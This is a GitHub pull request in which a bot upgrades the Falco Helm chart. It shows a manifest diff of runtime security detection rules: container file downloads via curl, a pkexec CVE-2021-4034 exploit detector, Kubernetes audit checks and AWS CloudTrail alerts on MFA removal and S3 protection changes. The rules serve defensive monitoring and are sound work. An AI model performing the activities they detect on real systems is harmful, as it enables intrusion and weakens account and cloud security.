+                  proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
@@ -3618,6 +4112,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3741,7 +4248,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
-        k8s.gcr.io/addon-resizer
+        k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
         k8s.gcr.io/k8s-dns-kube-dns-amd64,
@@ -3768,9 +4275,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4326,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -4003,7 +4532,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4713,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 0935aaf38698d1d90b1eab3b7ba0b676871a2cb48fc56de1713a4b249eaaa036
+        checksum/rules: 900b3da642a2613387e1173f9a8333aa5ec6fa232d4d0e37868ea5e3c0d89a58
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4725,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.31.1
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4740,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4775,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4804,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4837,8 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.18.6 chore(deps): update helm release falco to v1.19.0 Jun 7, 2022
@github-actions
Copy link
Contributor

github-actions bot commented Jun 7, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.0

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
